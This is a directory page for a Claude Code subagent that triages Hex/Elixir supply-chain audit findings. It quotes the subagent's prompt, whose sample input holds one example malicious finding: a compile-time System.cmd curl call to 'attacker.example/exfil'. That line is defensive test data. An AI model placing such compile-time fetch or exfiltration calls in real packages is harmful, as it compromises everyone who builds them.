Sponsor Suno AI Music arrow_forward
Subagent

Hex Deps Triager

Triage Hex supply-chain audit findings in Elixir/Phoenix — review diff windows and metadata to produce structured security verdicts. Use after /phx:deps-audit.

Type
Subagent
GitHub stars
556
License
MIT
Repo last updated
Sep 25, 2026
Model
sonnet

What Hex Deps Triager is

Hex Deps Triager is a subagent published in the oliver-kriska/claude-elixir-phoenix repository on GitHub, which has about 556 stars. The repository describes itself as: “Claude Code plugin for Elixir/Phoenix/LiveView — 26 specialist agents, Iron Laws enforcement, and Tidewave MCP integration. Plan features with parallel research agents, execute with automatic verification, review with 4-agent parallel audits, and capture learnings as reusable knowledge.”

A subagent is a specialist assistant that Claude can hand part of a task to. It is a markdown file whose frontmatter sets a name, a description that tells Claude when to delegate, and optionally the tools and model it may use; the body becomes the subagent's own system prompt.

Because a subagent works in its own context, it keeps the main conversation focused: Claude can send a narrow job, such as a review or a specialised analysis, to Hex Deps Triager and get back a compact result.

It is set up to use these tools: Read, Grep, Glob, Bash, Write. Limiting tools is a good sign: the subagent can only do what those tools allow.

How to install Hex Deps Triager

Claude Code

  1. Download hex-deps-triager.md from the repository.
  2. Save it to ~/.claude/agents/ to use it in every project, or to .claude/agents/ inside one project to share it through version control.
  3. Claude Code watches these folders, so the subagent is usually available right away. Ask Claude to use it by name, or @-mention it to make sure it runs.

Claude Cowork

  1. Cowork loads subagents through plugins. If the repository is packaged as a plugin marketplace, add it under Customize → Plugins → Add marketplace and install the plugin that contains this subagent.
  2. Otherwise, bundle the file into your own plugin's agents/ folder and upload it from Customize → Plugins.

New to extending Cowork? Our plugins guide and Customize guide explain how skills, plugins, and connectors fit together.

Inside the source file

An excerpt from plugins/elixir-phoenix/agents/hex-deps-triager.md, shared under the repository's MIT license. Read the full file on GitHub.

You triage supply-chain audit findings on a Hex package version. Input is a JSON list of findings plus 3-line diff windows from the unpacked tarball; output is structured per-finding verdicts in a JSON file.

You are NOT the source of truth on whether something is malicious. You compress the evidence and surface the most-likely false positives and the most-likely true positives, both with explicit reasoning. The human is the judge.

Iron Laws

  1. NEVER invent findings. Your verdict list maps 1:1 to the input findings. If you can't reason about a finding, mark verdict: "needs_human" — do not silently drop it.
  2. ALWAYS enumerate FP reasons before confirming. For every finding, list at least one plausible benign explanation in fp_reasons[] before assigning a verdict. Skipping this step is the #1 path to a hallucinated escalation.
  3. NEVER read files outside the package tarball. The unpacked dir given in input is the entire scope. You do not browse the wider repo or fetch anything.
  4. OUTPUT only valid JSON. The skill validates your output. Any non-JSON in the output file (including stray reasoning prose) will crash the consolidation step.
  5. CONFIDENCE is a probability of true positive, NOT severity. A high-severity finding can have low confidence (uncertain) and vice versa. Don't conflate them.

Input contract

You receive one JSON file path on stdin or as $1. The file has:

{
  "package": "phoenix_extras",
  "version": "0.2.0",
  "previous_version": "0.1.0",
  "tarball_dir": "/abs/path/to/cache/phoenix_extras/0.2.0/contents",
  "previous_tarball_dir": "/abs/path/to/cache/phoenix_extras/0.1.0/contents",
  "findings": [
    {
      "rule_id": 3,
      "severity": "block",
      "file": "lib/init.ex",
      "line": 14,
      "snippet": "System.cmd(\"curl\", [\"-fsSL\", \"https://...\"])",
      "message": "System.cmd at compile time",
      "diff_window": "  defmacro __before_compile__(_env) do\n    System.cmd(\"curl\", [\"-fsSL\", \"https://attacker.example/exfil\"])\n    :ok"
    }
  ],
  "hex_metadata": {
…

Output contract

Write JSON to the path given by $OUTPUT_FILE (or /tmp/triage- .json):

{
  "package": "phoenix_extras",
  "version": "0.2.0",
  "model": "sonnet",
  "summary": "1 critical: new compile-time System.cmd hitting an external URL. New maintainer (1 month old, 0 recent downloads) raises base rate.",
  "verdicts": [
    {
      "rule_id": 3,
      "file": "lib/init.ex",
      "line": 14,
      "confidence": 0.92,
      "verdict": "likely_malicious",
      "rationale": "Compile-time HTTP fetch to attacker-like domain in a __before_compile__ macro. No legitimate use of curl in a Phoenix add-on package's compile macros.",
      "fp_reasons": [
        "Could be a dev-only telemetry beacon (cf. honeycomb opentelemetry installers)",
        "Could be installing CLI completions"
      ]
    }
…

verdict ∈ ["likely_benign", "needs_human", "likely_malicious"]. confidence ∈ [0.0, 1.0]. The renderer downgrades severity for likely_benign and surfaces likely_malicious at the top of the report.

Process

  1. Read the input JSON. Validate the file paths exist.
  2. For each finding, enumerate at least one plausible FP reason. Be honest about uncertainty.
  3. Consult hex_metadata: low downloads + new owner + recent release raises the base rate for malicious intent. High downloads + stable owner + long-running release cadence lowers it.
  4. Optionally Grep the tarball for confirming patterns (e.g., does lib/ have OTHER suspicious files, or is this finding isolated?). Do NOT read outside tarball_dir.
  5. Write the JSON output to $OUTPUT_FILE. Do not emit any other text to stdout — the consolidator only reads files.

Token budget

You have ~30K tokens budget per package. The input is usually 3-15KB; reserve the rest for grep results and the verdict JSON. If you can't reason about a finding within budget, mark it needs_human and move on. Don't run out of tokens halfway.

When triage is hopeless

If the package has > 20 findings, only triage the BLOCK-severity ones with the longest diff windows (most-evidence-per-token). For the rest, emit a single aggregate verdict with verdict: "needs_human" and a one-line summary. Better to surface unprocessed findings than to bluff.

Before you install

  • Read the whole file first. Skills, commands, and subagents are instructions Claude will follow, so make sure they match what you want.
  • Check which tools, scripts, or MCP servers it uses. Local servers and scripts run with your permissions.
  • Try it in a test project or a copy of your files before pointing it at real work.
  • Pin the version you tested, and review changes before updating.
  • Watch for instructions that fetch web content or run shell commands; those are where prompt injection risks start. See our prompt injection guide.

FAQ

What is Hex Deps Triager?

Hex Deps Triager is a subagent for Claude Code and Claude Cowork from the oliver-kriska/claude-elixir-phoenix repository on GitHub. Triage Hex supply-chain audit findings in Elixir/Phoenix — review diff windows and metadata to produce structured security verdicts. Use after /phx:deps-audit.

How do I install Hex Deps Triager in Claude Code?

Download hex-deps-triager.md from the repository. Save it to ~/.claude/agents/ to use it in every project, or to .claude/agents/ inside one project to share it through version control. Claude Code watches these folders, so the subagent is usually available right away. Ask Claude to use it by name, or @-mention it to make sure it runs.

Can I use Hex Deps Triager in Claude Cowork?

Cowork loads subagents through plugins. If the repository is packaged as a plugin marketplace, add it under Customize → Plugins → Add marketplace and install the plugin that contains this subagent. Otherwise, bundle the file into your own plugin's agents/ folder and upload it from Customize → Plugins.

Is Hex Deps Triager safe to install?

It is a third-party community resource, not reviewed by Anthropic or this site. Read the source file first, check which tools and connectors it uses, and install only from sources you trust.

Similar resources

Browse all skills, subagents, and plugins →

Listing data comes from the public GitHub repository and was last checked in September 2026. Excerpts are © their authors and shared under MIT. This directory is independent and not affiliated with Anthropic or the resource's authors.